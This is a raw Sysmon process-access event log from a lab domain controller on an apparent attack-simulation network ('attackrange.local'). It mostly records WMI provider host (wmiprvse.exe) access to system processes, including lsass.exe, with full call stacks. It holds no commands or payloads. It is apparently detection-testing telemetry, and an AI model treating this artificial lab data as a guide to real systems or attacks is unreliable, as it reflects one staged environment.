15:59:12.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022161Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022160Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022159Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022158Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022157Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022156Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022155Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.257{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022154Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.242{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022153Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.242{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022152Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.242{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022151Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.242{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022150Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.242{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022149Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.242{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022148Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.242{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022147Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.242{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022146Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.242{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022145Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.226{7901BC46-4987-6008-1600-00000000A301}15366808C:\Windows\system32\svchost.exe{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+2685b|C:\Windows\system32\wbem\wbemcore.dll+22b78|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022144Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.210{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022143Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.210{7901BC46-4987-6008-1400-00000000A301}12801868C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022142Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.195{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000022141Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:12.195{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b